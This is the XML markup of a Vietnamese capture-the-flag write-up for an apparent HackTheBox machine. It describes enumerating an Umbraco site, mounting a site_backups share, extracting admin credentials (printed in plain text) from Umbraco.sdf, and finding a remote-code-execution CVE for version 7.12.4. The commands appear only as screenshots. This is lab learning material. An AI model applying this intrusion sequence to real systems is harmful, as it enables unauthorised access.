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D68AA" w14:textId="46F1273E" w:rsidR="002F49FE" w:rsidRDefault="00367950">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="394C8490" wp14:editId="56B7EC09">
            <wp:extent cx="5943600" cy="281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2C7B4A92" w14:textId="7C939CBD" w:rsidR="000B0270" w:rsidRDefault="000B0270"/>
    <w:p w14:paraId="45F0FDF7" w14:textId="494BB795" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0"/>
    <w:p w14:paraId="505A7B91" w14:textId="18EF2FAF" w:rsidR="00AA49E0" w:rsidRPr="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA49E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B04F962" w14:textId="78DFEFE7" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42035FD0" w14:textId="4AC55A61" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giao diện web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10291861" w14:textId="6CAC10C4" w:rsidR="00AA49E0" w:rsidRPr="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="200C0DEA" wp14:editId="617B6B47">
            <wp:extent cx="5105219" cy="2952012"/>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 cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="9891" t="20514" r="4195"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5106408" cy="2952700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B679C" w14:textId="76E2049A" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D77989" w14:textId="412DAC71" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trang contact có 1 form đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D54A1" w14:textId="1BE45558" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21AAD4EE" w14:textId="38A3D21F" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F870E6F" wp14:editId="2F505A45">
            <wp:extent cx="5257800" cy="2677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 cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="8426" t="21099" r="3074" b="6802"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5260041" cy="2678301"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC0CCEB" w14:textId="5E3344A2" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6F50A8" w14:textId="009B191B" w:rsidR="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F9BFEC3" wp14:editId="6FC8545B">
            <wp:extent cx="3275902" cy="2764064"/>
            <wp:effectExtent l="0" t="0" r="127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 cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="22165" t="20813" r="22701" b="4755"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3276960" cy="2764956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA25286" w14:textId="4E05F6BD" w:rsidR="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006529ED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ứng dụng đang dùng CMS Umbraco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49B2FD" w14:textId="3C644271" w:rsidR="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D55BB2B" w14:textId="77777777" w:rsidR="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457BF920" w14:textId="4072B492" w:rsidR="0071467C" w:rsidRDefault="0071467C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dịch vụ ftp không có gì để khai thác cả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B862A45" w14:textId="35105BC1" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9CC7EA" w14:textId="3B1A314C" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4DD79B" w14:textId="0878546E" w:rsidR="0071467C" w:rsidRPr="0071467C" w:rsidRDefault="00F37ECB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B4BC772" wp14:editId="48BEE2ED">
            <wp:extent cx="5943600" cy="2239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2239010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7FAAB" w14:textId="591ED110" w:rsidR="00A932FD" w:rsidRDefault="00A932FD"/>
    <w:p w14:paraId="0E472BC2" w14:textId="756F33E6" w:rsidR="006529ED" w:rsidRPr="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình có thể mount đến share site_backups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631EAFE" w14:textId="1F693FA1" w:rsidR="00A932FD" w:rsidRDefault="005835A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA14B7D" wp14:editId="251FD9D7">
            <wp:extent cx="3530600" cy="92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3530600" cy="927100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BAB6D1" w14:textId="77777777" w:rsidR="00F37ECB" w:rsidRDefault="00F37ECB"/>
    <w:p w14:paraId="38C020F2" w14:textId="42E0C9E2" w:rsidR="005835A5" w:rsidRDefault="00F37ECB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44ADB54C" wp14:editId="437CA240">
            <wp:extent cx="5257800" cy="83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257800" cy="838200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="092DB04D" w14:textId="5131E27C" w:rsidR="005835A5" w:rsidRDefault="00B55264">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C75CDB3" wp14:editId="065A4C68">
            <wp:extent cx="5943600" cy="9442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944245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CA8B70" w14:textId="5253F9BD" w:rsidR="00B55264" w:rsidRDefault="00B55264"/>
    <w:p w14:paraId="4A0EE999" w14:textId="6114930B" w:rsidR="008E7A59" w:rsidRDefault="00C22B12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta không có quyền ghi, thực thi tập tin trong NTFS share. Nhưng ứ</w:t>
      </w:r>
      <w:r w:rsidR="008E7A59">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng dụng vẫn bị rò rỉ thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F286884" w14:textId="5B180ED2" w:rsidR="0030000D" w:rsidRDefault="0030000D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FD722B" w14:textId="273FA680" w:rsidR="00AA49E0" w:rsidRDefault="00AA49E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Thật sự mình rất khó khăn để tìm được manh mối khai thác. </w:t>
      </w:r>
      <w:r w:rsidR="006529ED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình duyệt hết các thư mục mình nghĩ là nhạy cảm như tệp cấu hình, cài đặt,… nhưng không tìm được gì quan trọng. Phạm vi mình đang tìm kiếm là những tập tin nhạy cảm trong webroot, nó quá lớn nên mình sẽ thu hẹp lại, chỉ tập trung vào cms Umbraco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE353CB" w14:textId="5F126C0F" w:rsidR="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C86911" w14:textId="5F461669" w:rsidR="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình tìm kiếm trên mạng những tập tin nhạy cảm của Umbraco thì trong App_Data có Umbraco.sdf</w:t>
      </w:r>
      <w:r w:rsidR="009667ED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, là tập tin lưu trữ dữ liệu của SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFF79A5" w14:textId="69EA95BE" w:rsidR="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677F7BF4" w14:textId="1ED69961" w:rsidR="006529ED" w:rsidRDefault="006529ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FCABE80" wp14:editId="60FB0C94">
            <wp:extent cx="5943600" cy="7264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726440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6F2E9" w14:textId="506191DC" w:rsidR="009667ED" w:rsidRDefault="009667ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A258E1F" w14:textId="19AF18DC" w:rsidR="009667ED" w:rsidRDefault="009667ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình tìm mọi cách để mở nó nhưng thật sự bế tắc! Điều này lại khiến mình lạc lối, không biết tìm hướng nào để khai thác! Mình có xem qua hướng dẫn của Hackthebox thì cách mở khá đơn giản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D597920" w14:textId="1C88AC39" w:rsidR="009667ED" w:rsidRDefault="009667ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4243DA41" w14:textId="3BC16AFE" w:rsidR="009667ED" w:rsidRDefault="009667ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B3B278" wp14:editId="66649552">
            <wp:extent cx="5943600" cy="12198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219835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="063263F3" w14:textId="70A28A27" w:rsidR="009667ED" w:rsidRDefault="009667ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269ADB0D" w14:textId="13A39739" w:rsidR="009667ED" w:rsidRDefault="009667ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05ED1B6F" wp14:editId="29E66E7F">
            <wp:extent cx="3441700" cy="1092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3441700" cy="1092200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53672449" w14:textId="77F33F30" w:rsidR="009667ED" w:rsidRDefault="009667ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D575DD6" w14:textId="49CC16F6" w:rsidR="00BC51F2" w:rsidRDefault="00BF5C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF5C4C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin@htb.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5C4C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>baconandcheese</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599C564" w14:textId="24E4281E" w:rsidR="009667ED" w:rsidRDefault="009667ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE3DC21" w14:textId="0AD849F0" w:rsidR="00740BAA" w:rsidRDefault="00740BAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bạn đăng nhập trang web, tìm phiên bản của Umbraco: 7.12.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26993A74" w14:textId="5F644BCE" w:rsidR="00D92B01" w:rsidRDefault="00D92B01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25BD0B9C" w14:textId="3A4AC39F" w:rsidR="00D92B01" w:rsidRDefault="00D92B01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="613F8FEA" wp14:editId="2547D2CC">
            <wp:extent cx="5233916" cy="30283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5312" t="18465" r="6614"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5234811" cy="3028833"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE136F" w14:textId="77777777" w:rsidR="00740BAA" w:rsidRDefault="00740BAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605997DA" w14:textId="38334AAB" w:rsidR="008E7A59" w:rsidRDefault="0009051B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình tìm thấy 1 CVE của Umbraco cho phép thực thi lệnh từ xa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C4440F" w14:textId="5E73C74B" w:rsidR="0009051B" w:rsidRDefault="0009051B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB16BE7" w14:textId="4F6E96DA" w:rsidR="0009051B" w:rsidRDefault="00740BAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08F7972E" wp14:editId="40B3FFA3">
            <wp:extent cx="5234745" cy="3004457"/>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l="3663" t="17293" r="8232" b="1801"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5236535" cy="3005485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E129E" w14:textId="2B3D270B" w:rsidR="00D92B01" w:rsidRDefault="00D92B01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640F9D32" w14:textId="4B33918A" w:rsidR="00D92B01" w:rsidRDefault="00117495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
